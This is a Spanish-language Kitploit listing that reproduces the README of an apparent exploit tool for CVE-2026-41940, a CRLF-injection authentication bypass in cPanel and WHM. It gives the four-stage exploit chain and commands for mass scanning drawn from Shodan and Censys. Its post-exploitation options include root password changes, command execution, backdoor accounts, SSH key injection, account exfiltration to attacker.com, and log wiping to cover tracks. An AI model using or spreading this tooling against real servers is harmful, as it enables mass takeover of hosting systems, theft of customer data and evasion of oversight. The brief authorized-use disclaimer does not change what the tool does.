Skip to content
KitploitKITPLOIT
HerramientasBlog
Enviar
HerramientasBlog
Enviar

¡Herramientas de Hacking, PenTest y Ciberseguridad para tu Arsenal de Seguridad!

Kitploit es un directorio de herramientas de hacking, ciberseguridad y pentesting. Descubre las últimas actualizaciones de proyectos para encontrar vulnerabilidades, analizar sistemas, automatizar pruebas y fortalecer tu seguridad.

··Feeds·Contacto·Privacidad·© 2026 Kitploit

Directorio de Herramientas

Categorías

Ver todas las categorías
Loading categories
CVE-2026-41940-Exploit-PoC — Exploit PoC para CVE-2026-41940, una omisión de autenticación en cPanel y WHM mediante inyección CRLF. Incluye escaneo masivo, acciones posteriores a la explotación y un shell interactivo para pruebas autorizadas. | Kitploit
Herramientas/GitHubGitHub/ishanoshada/cve-2026-41940-exploit-poc
Autenticación y AutorizaciónEscáneres de VulnerabilidadesExplotaciónExplotación de Aplicaciones WebPost-ExplotaciónPruebas de PenetraciónRed TeamingDesarrollo de Payloads

Más Populares

Ver todos →

Descubre las herramientas más usadas por nuestra comunidad.

Explora todas las herramientas

Explora nuestra colección de herramientas

Ver todas las herramientas →
Compartir
GitHub
ishanoshada/cve-2026-41940-exploit-poc

CVE-2026-41940-Exploit-PoC

Exploit PoC para CVE-2026-41940, una omisión de autenticación en cPanel y WHM mediante inyección CRLF. Incluye escaneo masivo, acciones posteriores a la explotación y un shell interactivo para pruebas autorizadas.

Ver RepositorioSitio web
21hace 3 mesesAún no revisado

CVE-2026-41940 Exploit PoC – Bypass de Autenticación en cPanel & WHM

CVE-2026-41940 CVSS Go Version License

Herramienta por: Ishan Oshada | GitHub

⚠️ SOLO PARA PRUEBAS DE SEGURIDAD AUTORIZADAS. El uso no autorizado es ilegal.

1


📋 Tabla de Contenidos

  • Resumen de la Vulnerabilidad
  • Cadena de Explotación
  • Características
  • Instalación
  • Inicio Rápido
  • Ejemplos de Uso (Tabla)
  • Acciones Post-Explotación
  • Comandos del Shell Interactivo
  • Escaneo Masivo con urls.txt
  • Ejemplos de Salida
  • Referencia de Opciones
  • Versiones Afectadas
  • Compilación para Todas las Plataformas
  • Preguntas Frecuentes y Solución de Problemas
  • Descargo de Responsabilidad
  • Autor

2

Resumen de la Vulnerabilidad

CVE-2026-41940 es una vulnerabilidad de inyección CRLF en cPanel & WHM (versiones < 11.110.0.97, 11.118.0.63, 11.126.0.54, 11.132.0.29, 11.134.0.20, 11.136.0.5).

La función saveSession() escribe los datos de sesión después de aplicar filter_sessiondata(), pero el filtro se aplica demasiado tarde. Al inyectar caracteres CRLF (\r\n) dentro de la cabecera Authorization: Basic, un atacante puede envenenar el archivo de sesión en disco con pares clave-valor arbitrarios (por ejemplo, hasroot=1, tfa_verified=1, user=root).

Cuando la sesión envenenada se carga posteriormente, cPanel/WHM otorga acceso root completo sin ninguna contraseña.

Puntuación CVSS: 10.0 (CRÍTICA)

  • Vector de Ataque: Red
  • Complejidad del Ataque: Baja
  • Privilegios Requeridos: Ninguno
  • Interacción del Usuario: Ninguna
  • Confidencialidad: Alta
  • Integridad: Alta
  • Disponibilidad: Alta

Cadena de Explotación (4 Etapas)


Características

  • ✅ Escaneo individual y masivo (entrada de archivo, tubería stdin)
  • ✅ Escaneo con hilos (control de concurrencia hasta 100+ hilos)
  • ✅ Modo verbose (--verbose) – muestra solicitudes/respuestas HTTP completas
  • ✅ Salida JSON (se guarda automáticamente cuando se encuentra un objetivo vulnerable)
  • ✅ 10 acciones post-explotación (ver tabla a continuación)
  • ✅ Multiplataforma (Windows, Linux, macOS)
  • ✅ Sin dependencias externas (solo biblioteca estándar de Go)
  • ✅ Salida de terminal colorida con resultados en recuadros claros
  • ✅ Persistencia de sesión – mecanismo de keep-alive
  • ✅ Shell WHM interactivo con historial de comandos

Instalación

Requisitos Previos

  • Go 1.20 o superior (Descargar)

Clonar el Repositorio

root@kitploit:~
git clone https://github.com/ishanoshada/CVE-2026-41940-Exploit-PoC.git
cd CVE-2026-41940-Exploit-PoC

Compilar el Ejecutable

Windows

root@kitploit:~
go build -o cpanel_sniper.exe main.go

Linux / macOS

root@kitploit:~
go build -o cpanel_sniper main.go
chmod +x cpanel_sniper

Ejecutar Directamente (Sin Compilar)

root@kitploit:~
go run main.go -u https://target.com:2087

Binarios Precompilados (Forma Más Rápida)

En lugar de compilar desde el código fuente, puedes descargar los ejecutables estables más recientes directamente del repositorio. Se generan automáticamente para cada actualización:

Nota: Si usas Linux o macOS, recuerda otorgar permisos de ejecución después de descargar:


Inicio Rápido

root@kitploit:~
# Escaneo básico
go run main.go -u https://target.com:2087

# Listar todas las cuentas de cPanel
go run main.go -u https://target.com:2087 -action list

# Shell WHM interactivo
go run main.go -u https://target.com:2087 -action shell

# Escaneo masivo con urls.txt
go run main.go -l urls.txt -t 20 -o results.json

Ejemplos de Uso (Tabla)


Acciones Post-Explotación


Comandos del Shell Interactivo

Una vez dentro del shell (-action shell), usa estos comandos:


Escaneo Masivo con urls.txt

El repositorio incluye urls.txt con 1000 objetivos de ejemplo para escaneo masivo.

Formato de urls.txt

root@kitploit:~
https://192.168.1.1:2087
https://192.168.1.2:2087
https://example1.com:2087
https://example2.com:2087
...

Comandos de Escaneo Masivo

root@kitploit:~
# Escaneo masivo básico (10 hilos)
go run main.go -l urls.txt

# Escaneo masivo rápido (50 hilos, guardar resultados)
go run main.go -l urls.txt -t 50 -o results.json

# Escaneo masivo con acción post-explotación
go run main.go -l urls.txt -t 20 -action list -o hacked_servers.json

# Escaneo masivo con salida verbose
go run main.go -l urls.txt -t 10 --verbose

# Escaneo masivo con tiempo de espera aumentado (redes lentas)
go run main.go -l urls.txt -t 30 -timeout 30

Generar urls.txt Tú Mismo

root@kitploit:~
# Generar rango de IP (Linux/macOS)
for i in {1..254}; do echo "https://192.168.1.$i:2087"; done > urls.txt

# Generar rango de IP (Windows PowerShell)
1..254 | ForEach-Object { "https://192.168.1.$($_):2087" } > urls.txt

# Desde Shodan
shodan search --fields ip_str,port 'title:"WHM Login"' | awk '{print "https://"$1":"$2}' > urls.txt

# Desde Censys
censys search 'services.port=2087' | awk '{print "https://"$1":2087"}' > urls.txt

Ejemplos de Salida

Objetivo Vulnerable Encontrado

root@kitploit:~
╔════════════════════════════════════════════════════════════════╗
║                    OBJETIVO VULNERABLE DETECTADO               ║
╠════════════════════════════════════════════════════════════════╣
║ Target: https://target.example.com:2087                        ║
║ Token: /cpsess1234567890                                       ║
║ Version: 11.76.0.22                                            ║
║ Session: :od2aMhg5zJeQunUy...                                  ║
║ API URL: https://target.example.com:2087/cpsess1234567890/json-api/version ║
╚════════════════════════════════════════════════════════════════╝

[+] Acción: LIST
    • Usuario: admin | Dominio: example.com
    • Usuario: backup | Dominio: backup.example.com
    • Usuario: client1 | Dominio: client1.com

Resumen de Salida

root@kitploit:~
════════════════════════════════════════════════════════════════════
                    RESUMEN DE ESCANEO COMPLETO
════════════════════════════════════════════════════════════════════
  Total de Objetivos Escaneados: 1000
  Objetivos Vulnerables: 47
  Tiempo Transcurrido: 125.34 segundos

OBJETIVOS VULNERABLES:
────────────────────────────────────────────────────────────────
  1. https://192.168.1.15:2087
      Token: /cpsess1111111111
      Version: 11.76.0.22
      Session: :od2aMhg5zJeQunUy...
  2. https://192.168.1.42:2087
      Token: /cpsess2222222222
      Version: 11.86.0.15
      Session: Km2psnYR9w3rRkLU...
  3. https://example.com:2087
      Token: /cpsess3333333333
      Version: 11.118.0.42
      Session: Xk9mQrNtPw3sVbLm...

════════════════════════════════════════════════════════════════════

[✓] Resultados guardados en: results.json

Referencia de Opciones


Versiones Afectadas


Compilación para Todas las Plataformas

Windows

root@kitploit:~
go build -o cpanel_sniper.exe main.go
cpanel_sniper.exe -u https://target.com:2087

Linux

root@kitploit:~
go build -o cpanel_sniper main.go
chmod +x cpanel_sniper
./cpanel_sniper -u https://target.com:2087

macOS (Intel)

root@kitploit:~
GOOS=darwin GOARCH=amd64 go build -o cpanel_sniper_mac_intel main.go

macOS (Apple Silicon M1/M2/M3)

root@kitploit:~
GOOS=darwin GOARCH=arm64 go build -o cpanel_sniper_mac_m1 main.go

Compilación Cruzada para Todas las Plataformas

root@kitploit:~
# Windows
GOOS=windows GOARCH=amd64 go build -o cpanel_sniper_windows.exe main.go

# Linux
GOOS=linux GOARCH=amd64 go build -o cpanel_sniper_linux main.go

# macOS Intel
GOOS=darwin GOARCH=amd64 go build -o cpanel_sniper_mac_intel main.go

# macOS M1/M2
GOOS=darwin GOARCH=arm64 go build -o cpanel_sniper_mac_m1 main.go

# Linux ARM (Raspberry Pi)
GOOS=linux GOARCH=arm64 go build -o cpanel_sniper_linux_arm64 main.go

Estructura del Directorio

root@kitploit:~
CVE-2026-41940-Exploit-PoC/
├── README.md           # Documentación
├── bin/                # Ejecutables precompilados multiplataforma 
│   ├── windows_x64/
│   ├── linux_x64/
│   └── ...
├── main.go             # Código fuente principal
├── urls.txt            # 1000 objetivos de ejemplo
├── go.mod              # Archivo de módulo Go
├── .gitignore          # Archivo de ignorados de Git
└── results.json        # Archivo de salida (generado)

Descargo de Responsabilidad

Esta herramienta es solo para fines educativos y pruebas de penetración autorizadas.

El acceso no autorizado a sistemas informáticos es ilegal según:

  • Computer Fraud and Abuse Act (CFAA) - EE. UU.
  • Computer Misuse Act - Reino Unido
  • Information Technology Act - India
  • Leyes similares en todo el mundo

El autor no asume ninguna responsabilidad por el mal uso. Úsala bajo tu propio riesgo.

Al usar esta herramienta, aceptas que tienes la autorización adecuada para probar los sistemas objetivo.


Autor

Ishan Oshada

  • 🔗 Sitio web: ishanoshada.com
  • 🐙 GitHub: github.com/ishanoshada
  • 📧 Correo electrónico: [email protected]

Views

Soporte

Si encuentras útil esta herramienta:

  • ⭐ Marca el repositorio con una estrella en GitHub
  • 🔄 Compártela con la comunidad de seguridad
  • 📝 Reporta problemas a través de GitHub Issues

¡Feliz Hacking! 🚀

Recuerda: Un gran poder conlleva una gran responsabilidad. Úsala éticamente.

Descargar herramienta
EtapaAcciónDescripción
1POST /login/?login_only=1Solicitar cookie de sesión pre-autenticación con credenciales incorrectas
2GET / + cabecera Authorization con CRLFEnvenenar el archivo de sesión con hasroot=1, user=root, etc.
3GET /scripts2/listacctsForzar la recarga de la caché de sesión con el archivo envenenado (propagación)
4GET /cpsess<TOKEN>/json-api/versionVerificar acceso root – éxito = 200 + datos de versión
PlataformaUbicación
Windows (x64)/bin/windows_x64/cpanel_sniper.exe
Linux (x64)/bin/linux_x64/cpanel_sniper
Linux (ARM64)/bin/linux_arm64/cpanel_sniper
macOS (Intel)/bin/mac_intel/cpanel_sniper
macOS (M1/M2/M3)/bin/mac_m1_m2/cpanel_sniper
#PropósitoComando
1Escaneo básico de objetivo únicogo run main.go -u https://target.com:2087
2Listar todas las cuentas de cPanelgo run main.go -u https://target.com:2087 -action list
3Cambiar contraseña de rootgo run main.go -u https://target.com:2087 -action passwd -passwd "NewP@ssw0rd!2006"
4Ejecutar comando del sistemago run main.go -u https://target.com:2087 -action cmd -cmd "id && whoami"
5Obtener información del servidorgo run main.go -u https://target.com:2087 -action info
6Crear usuario backdoorgo run main.go -u https://target.com:2087 -action adduser -new-user backdoor -new-domain backdoor.com -passwd "Pass123!2006"
7Crear token de API (sigiloso)go run main.go -u https://target.com:2087 -action apitoken -tokenname mytoken
8Inyectar clave SSHgo run main.go -u https://target.com:2087 -action sshkey -sshkey "ssh-rsa AAAAB3NzaC1yc2E..."
9Volcar y exfiltrar cuentago run main.go -u https://target.com:2087 -action dumpacct -dumpuser victim -exfil https://attacker.com/upload
10Borrar registros y cubrir rastrosgo run main.go -u https://target.com:2087 -action wipe
11Shell WHM interactivogo run main.go -u https://target.com:2087 -action shell
12Escaneo masivo desde archivogo run main.go -l urls.txt -t 20 -o results.json
13Guardar resultados en JSONgo run main.go -u https://target.com:2087 -o scan_results.json
14Habilitar depuración verbosego run main.go -u https://target.com:2087 --verbose
15Tubería desde otras herramientascat urls.txt | go run main.go -t 20
16Aumentar tiempo de esperago run main.go -u https://target.com:2087 -timeout 30
AcciónBanderaDescripciónNivel de Sigilo
list-action listListar todas las cuentas de cPanelBajo
passwd-action passwd -passwd NEWPASSCambiar contraseña de root (ruidoso)Alto (detectable)
cmd-action cmd -cmd "id"Ejecutar comandos del sistema operativoMedio
info-action infoMostrar hostname, carga, versiónBajo
adduser-action adduser -new-user U -new-domain DCrear usuario backdoor de cPanelMedio
apitoken-action apitoken [-tokenname NAME]Generar token de API persistenteMuy Bajo
sshkey-action sshkey -sshkey "ssh-rsa..."Inyectar clave pública SSH en rootMuy Bajo
dumpacct-action dumpacct -dumpuser USER -exfil URLRespaldar y exfiltrar cuentaMedio
wipe-action wipeDeshabilitar WAF, borrar registros, limpiar historialCubrir rastros
shell-action shellShell WHM interactivoBajo
ComandoDescripciónEjemplo
accountsListar todas las cuentas de cPanelaccounts
passwd <pass>Cambiar contraseña de rootpasswd MyNewPass123!2006
exec <command>Ejecutar comando del sistemaexec "cat /etc/passwd"
infoMostrar información del servidorinfo
versionMostrar versión de cPanelversion
helpMostrar comandos disponibleshelp
exitSalir del shellexit
OpciónTipoPredeterminadoDescripción
-ustring-URL del objetivo (ej., https://example.com:2087)
-lstring-Archivo con objetivos (uno por línea)
-tint10Número de hilos concurrentes
-actionstring-Acción post-explotación
-passwdstring-Nueva contraseña (para passwd/adduser)
-cmdstring-Comando a ejecutar (para acción cmd)
-new-userstring-Nombre de usuario para acción adduser
-new-domainstring-Dominio para acción adduser
-tokennamestring-Nombre para token de API (acción apitoken)
-sshkeystring-Clave SSH pública a inyectar (acción sshkey)
-dumpuserstring-Usuario a respaldar (acción dumpacct)
-exfilstring-URL remota para exfiltración (acción dumpacct)
-ostring-Archivo JSON de salida (se guarda automáticamente al encontrar)
--verboseboolfalseMostrar solicitudes/respuestas HTTP
-hboolfalseMostrar menú de ayuda
RamaVersión ParcheadaVulnerable <
11.11011.110.0.9711.110.0.96
11.11811.118.0.6311.118.0.62
11.12611.126.0.5411.126.0.53
11.13211.132.0.2911.132.0.28
11.13411.134.0.2011.134.0.19
11.13611.136.0.511.136.0.4